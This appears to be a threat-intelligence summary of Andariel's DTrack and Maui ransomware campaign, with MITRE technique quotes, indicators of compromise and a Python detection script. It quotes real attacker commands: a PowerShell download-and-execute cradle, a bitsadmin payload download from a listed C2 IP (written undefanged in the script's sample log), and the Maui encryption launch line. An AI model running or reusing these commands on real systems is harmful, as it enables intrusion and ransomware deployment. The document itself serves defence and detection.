Andariel deploys DTrack and Maui ransomware

This analysis confirms a Maui ransomware incident in 2022 attributed to Andariel, who deployed a DTrack variant about ten hours earlier on the same target. The operation appears global in scope, with a Japanese victim and overlaps with India, Vietnam, and Russia, and attribution is offered with low-to-medium confidence. #Andariel #MauiRansomware

Keypoints

  • Timeline indicates 3Proxy tool (2020-12-25) followed by DTrack and then Maui (April 2021) on the same target, with Japan as a confirmed victim.
  • DTrack malware executes an embedded shellcode, then runs Windows commands to collect host information (ipconfig, tasklist, netstat, netsh, ping) and transmits data to a remote host.
  • A new information-gathering module of DTrack sends stolen data to a remote server over HTTP and can copy stolen files to the remote host on the same network.
  • Maui ransomware is launched with command-line parameters (-t 8 -x E:) and encrypts a drive, aided by RSA key components stored on the target (Maui.evd and Maui.key).
  • Additional DTrack modules and initial infection methods include 3Proxy deployment, an HTTP server chain (HFS), and a PowerShell-based dropper fetched from a remote host.
  • Victims include a Japanese housing company (April 15, 2021) and other victims in India, Vietnam, and Russia; the actor appears opportunistic, targeting exposed public services like WebLogic and HFS, and uses DTrack as the main payload.
  • Attribution connects DTrack/Preft-like code with Andariel (Stonefly/Silent Chollima), with high code similarity to prior DTrack variants and connections to Backdoor.Preft in Symantec reports.

MITRE Techniques

  • [T1059.001] PowerShell – Use of Windows PowerShell to download and execute a remote script. Quote: "C:\windows\system32\WindowsPowershell\v1.0\powershell.exe IEX (New-Object Net.WebClient).DownloadString('hxxp://145.232.235[.]222/usr/users/mini.ps1')"
  • [T1197] BITS Jobs – Use of Bitsadmin to download and run additional payloads. Quote: bitsadmin.exe /transfer myJob /download /priority high 'hxxp://145.232.235[.]222/usr/users/dwem.cert' "%appdata%\microsoft\mmc\dwem.cert"
  • [T1090] Proxy – Using legitimate proxy and tunneling tools to maintain access. Quote: “Using legitimate proxy and tunneling tools after initial infection or deploying them to maintain access.”
  • [T1190] Exploit Public-Facing Application – Compromise of exposed services (WebLogic) via CVE-2017-10271. Quote: “The actor compromised this server via the CVE-2017-10271 exploit.”
  • [T1486] Data Encrypted for Impact – Maui ransomware encryption using RSA keys and drive selection. Quote: "RSA private key C:\Windows\Temp\temp\bin\Maui.evd" and "RSA public key C:\Windows\Temp\temp\bin\Maui.key" and "C:\Windows\Temp\temp\bin\Maui.exe" with "-t 8 -x E:"
  • [T1041] Exfiltration Over C2 Channel – Data exfiltration to a remote host over HTTP. Quote: “the new information-gathering module sends stolen information to a remote server over HTTP” and “copies stolen files to the remote host on the same network.”
  • [T1057] Process Discovery – Enumerating running processes with tasklist. Quote: "C:\Windows\system32\cmd.exe" /c tasklist > "%Temp%\temp\task.list"
  • [T1016] System Network Configuration Discovery – Collecting network configuration via ipconfig and netsh. Quote: "C:\Windows\system32\cmd.exe" /c ipconfig /all and "C:\Windows\system32\cmd.exe" /c netsh interface show interface
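As an added defender-side example (not code from the Securelist report or from this summary), the following Python script runs a few simple detections over constructed process-creation log lines modelled on the commands quoted above: the PowerShell download cradle, the bitsadmin transfer, the burst of host-survey commands DTrack issues (ipconfig, tasklist, netstat, netsh, ping) from one parent process, and a Maui-style launch with -t/-x arguments from a path under Temp. The log format, host names, parent PIDs and timestamps are assumptions made for the example; the IP address and the command shapes come from the summary.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample records (not real telemetry), one per line:
#   timestamp|host|parent_pid|command_line
# Command lines are modelled on those quoted in the report; hosts, PIDs and
# timestamps are invented for this example.
SAMPLE_LOG = """\
2021-04-15T02:10:03|HOST01|4120|"C:\\Windows\\system32\\cmd.exe" /c ipconfig /all
2021-04-15T02:10:04|HOST01|4120|"C:\\Windows\\system32\\cmd.exe" /c tasklist > "%Temp%\\temp\\task.list"
2021-04-15T02:10:05|HOST01|4120|"C:\\Windows\\system32\\cmd.exe" /c netstat -ano
2021-04-15T02:10:06|HOST01|4120|"C:\\Windows\\system32\\cmd.exe" /c netsh interface show interface
2021-04-15T02:11:30|HOST01|1000|C:\\windows\\system32\\WindowsPowershell\\v1.0\\powershell.exe IEX (New-Object Net.WebClient).DownloadString('http://145.232.235.222/usr/users/mini.ps1')
2021-04-15T02:12:00|HOST01|1000|bitsadmin.exe /transfer myJob /download /priority high http://145.232.235.222/usr/users/dwem.cert %appdata%\\microsoft\\mmc\\dwem.cert
2021-04-15T12:40:00|HOST01|2200|C:\\Windows\\Temp\\temp\\bin\\Maui.exe -t 8 -x E:
2021-04-15T09:00:00|HOST02|3000|"C:\\Windows\\system32\\cmd.exe" /c ipconfig /all
"""

IOC_IP = "145.232.235.222"  # download/C2 host listed in the report
# Host-survey commands the DTrack module runs after its shellcode stage
DISCOVERY = ("ipconfig", "tasklist", "netstat", "netsh", "ping")


def classify(cmdline):
    """Return the technique tags matched by one command line (empty list if none)."""
    low = cmdline.lower()
    tags = []
    if "powershell" in low and "downloadstring" in low and ("iex" in low or "invoke-expression" in low):
        tags.append("T1059.001 PowerShell download cradle")
    if "bitsadmin" in low and "/transfer" in low and "/download" in low:
        tags.append("T1197 BITS download job")
    if IOC_IP in low:
        tags.append("IOC known download/C2 host")
    # Maui was started as <path under Temp>\Maui.exe -t <threads> -x <drive>:
    if re.search(r'\\temp\\.*\.exe"?\s+-t\s+\d+\s+-x\s+[a-z]:', low):
        tags.append("T1486 Maui-style launch (-t/-x from a Temp path)")
    if re.search(r"maui\.(evd|key)\b", low):
        tags.append("T1486 Maui RSA key material referenced")
    return tags


def parse(log_text):
    """Split the assumed pipe-delimited format into (timestamp, host, parent_pid, cmdline)."""
    records = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        ts, host, ppid, cmd = line.split("|", 3)
        records.append((datetime.fromisoformat(ts), host, ppid, cmd))
    return records


def discovery_bursts(records, window=timedelta(seconds=120), min_tools=3):
    """Flag (host, parent_pid) pairs that run >= min_tools distinct survey commands within `window`."""
    by_parent = defaultdict(list)
    for ts, host, ppid, cmd in records:
        low = cmd.lower()
        tool = next((t for t in DISCOVERY if re.search(r"\b" + t + r"\b", low)), None)
        if tool:
            by_parent[(host, ppid)].append((ts, tool))
    hits = {}
    for key, events in by_parent.items():
        events.sort()
        for i, (start, _) in enumerate(events):
            tools = {t for ts, t in events[i:] if ts - start <= window}
            if len(tools) >= min_tools:
                hits[key] = sorted(tools)
                break
    return hits


def scan(log_text):
    """Run both per-command and burst detections; returns a dict of findings."""
    records = parse(log_text)
    flagged = [(host, cmd, tags) for _, host, _, cmd in records if (tags := classify(cmd))]
    return {"flagged": flagged, "discovery_bursts": discovery_bursts(records)}


if __name__ == "__main__":
    result = scan(SAMPLE_LOG)
    for host, cmd, tags in result["flagged"]:
        print(f"[{host}] {', '.join(tags)}\n    {cmd}")
    for (host, ppid), tools in result["discovery_bursts"].items():
        print(f"[{host}] discovery burst under parent PID {ppid}: {', '.join(tools)}")
```

The per-command rules are deliberately narrow (a download cradle, a BITS transfer, the known host, the -t/-x launch shape), while the burst rule catches the DTrack survey even when the individual commands are benign-looking administrator tools; on real telemetry you would feed it Sysmon Event ID 1 or Windows 4688 records and tune the window and threshold to your environment.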

Indicators of Compromise

  • [MD5] – Example values observed – 739812e2ae1327a94e441719b885bd19, f2f787868a3064407d79173ac5fc0864, and 2 more hashes (DTrack variants)
  • [SHA1] – Example values observed – 102a6954a16e80de814bee7ae2b893f1fa196613, 94db86c214f4ab401e84ad26bb0c246059daff, and 2 more hashes
  • [SHA256] – Example values observed – 6122c94cbfa11311bea7129ecd5aea6fae6c51d23228f7378b5f6b2398728f67, a557a0c67b5baa7cf64bd4d42103d3b2852f67acf96b4c5f14992c1289b55eaa, and 2 more hashes
  • [File name] – Maui ransomware binary and related components – "C:\Windows\Temp\temp\maui.exe", "C:\Windows\Temp\temp\bin\Maui.evd" and "C:\Windows\Temp\temp\bin\Maui.key" (RSA keys); DTrack module binaries such as "C:\Windows\Temp\temp\mvhost.exe"
  • [IP Address] – Example observed IP used for command and control/downloads – 145.232.235.222
  • [URL/HTTP] – Remote script and payload delivery endpoints – hxxp://145.232.235[.]222/usr/users/mini.ps1, hxxp://145.232.235[.]222/usr/users/dwem.cert

Read more: https://securelist.com/andariel-deploys-dtrack-and-maui-ransomware/107063/